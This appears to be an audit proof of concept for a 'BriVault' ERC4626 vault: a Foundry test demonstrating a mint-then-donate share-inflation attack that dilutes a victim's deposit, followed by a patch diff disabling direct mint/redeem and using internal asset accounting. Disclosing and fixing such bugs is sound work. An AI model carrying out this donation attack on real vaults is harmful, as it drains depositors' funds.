pragma solidity ^0.8.24;
import {Test} from "forge-std/Test.sol";
import {BriVault} from "../src/briVault.sol";
import {IERC20} from "@openzeppelin/contracts/token/ERC20/IERC20.sol";
import {MockERC20} from "./MockErc20.t.sol";
contract ShareCalcManipulationWithMintTest is Test {
BriVault briVault;
MockERC20 mockToken;
address owner = makeAddr("owner");
address attacker = makeAddr("attacker");
address victim = makeAddr("victim");
address feeAddr = makeAddr("fee");
uint256 start;
uint256 end;
function setUp() public {
start = block.timestamp + 2 days;
end = start + 30 days;
mockToken = new MockERC20("Mock Token", "MTK");
mockToken.mint(attacker, 1000 ether);
mockToken.mint(victim, 1000 ether);
vm.startPrank(owner);
briVault = new BriVault(
IERC20(address(mockToken)),
150,
start,
feeAddr,
0.1 ether,
end
);
vm.stopPrank();
vm.prank(attacker);
mockToken.approve(address(briVault), type(uint256).max);
vm.prank(victim);
mockToken.approve(address(briVault), type(uint256).max);
}
function test_MintThenDonateDilutesVictimDeposits() public {
vm.startPrank(attacker);
uint256 attackerShares = briVault.mint(0.001 ether, attacker);
assertEq(attackerShares, briVault.balanceOf(attacker), "attacker got dust shares via mint");
mockToken.transfer(address(briVault), 500 ether);
vm.stopPrank();
vm.startPrank(victim);
uint256 victimShares = briVault.deposit(100 ether, victim);
vm.stopPrank();
assertLt(victimShares, 100 ether, "victim severely diluted by donation-inflated denominator");
assertGt(attackerShares, 0, "attacker retains initial shares capturing donated value");
}
}
@@
+ // --- Hard disable direct ERC4626 routes to enforce accounting & fees ---
+ error erc4626DirectMintDisabled();
+ error erc4626DirectRedeemDisabled();
+
+ function mint(uint256 shares, address receiver) public override returns (uint256) {
+ revert erc4626DirectMintDisabled();
+ }
+ function redeem(uint256 shares, address receiver, address owner) public override returns (uint256) {
+ revert erc4626DirectRedeemDisabled();
+ }
@@
- function _convertToShares(uint256 assets) internal view returns (uint256 shares) {
- uint256 balanceOfVault = IERC20(asset()).balanceOf(address(this));
- uint256 totalShares = totalSupply();
- if (totalShares == 0 || balanceOfVault == 0) {
- return assets;
- }
- shares = Math.mulDiv(assets, totalShares, balanceOfVault);
- }
+ // --- Use internal accounting that ignores external donations ---
+ uint256 public accountingAssets;
+
+ function _convertToShares(uint256 assets) internal view returns (uint256 shares) {
+ uint256 totalShares = totalSupply();
+ if (totalShares == 0 || accountingAssets == 0) {
+ // Bootstrap at 1:1 against accounted assets only
+ return assets;
+ }
+ shares = Math.mulDiv(assets, totalShares, accountingAssets);
+ }
@@
- function deposit(uint256 assets, address receiver) public override returns (uint256) {
+ function deposit(uint256 assets, address receiver) public override returns (uint256) {
if (block.timestamp >= eventStartDate) { revert eventStarted(); }
uint256 fee = _getParticipationFee(assets);
if (minimumAmount + fee > assets) { revert lowFeeAndAmount(); }
- uint256 stakeAsset = assets - fee;
- uint256 participantShares = _convertToShares(stakeAsset);
- IERC20(asset()).safeTransferFrom(msg.sender, participationFeeAddress, fee);
- IERC20(asset()).safeTransferFrom(msg.sender, address(this), stakeAsset);
- _mint(msg.sender, participantShares);
- stakedAsset[receiver] = stakeAsset;
+ uint256 nominal = assets - fee;
+ IERC20(asset()).safeTransferFrom(msg.sender, participationFeeAddress, fee);
+ // Measure actual received (handles fee-on-transfer tokens)
+ uint256 before = IERC20(asset()).balanceOf(address(this));
+ IERC20(asset()).safeTransferFrom(msg.sender, address(this), nominal);
+ uint256 received = IERC20(asset()).balanceOf(address(this)) - before;
+ require(received > 0, "zero received");
+ // Update internal accounting; donations won't alter this
+ accountingAssets += received;
+ uint256 participantShares = _convertToShares(received);
+ _mint(receiver, participantShares);
+ stakedAsset[receiver] += received;
emit deposited(receiver, /* stake */ received);
return participantShares;
}
@@
- function _setFinallizedVaultBalance () internal returns (uint256) {
- if (block.timestamp <= eventStartDate) { revert eventNotStarted(); }
- return finalizedVaultAsset = IERC20(asset()).balanceOf(address(this));
- }
+ function _setFinallizedVaultBalance () internal returns (uint256) {
+ if (block.timestamp <= eventStartDate) { revert eventNotStarted(); }
+ // Use accounted assets to avoid donation-based skew
+ return finalizedVaultAsset = accountingAssets;
+ }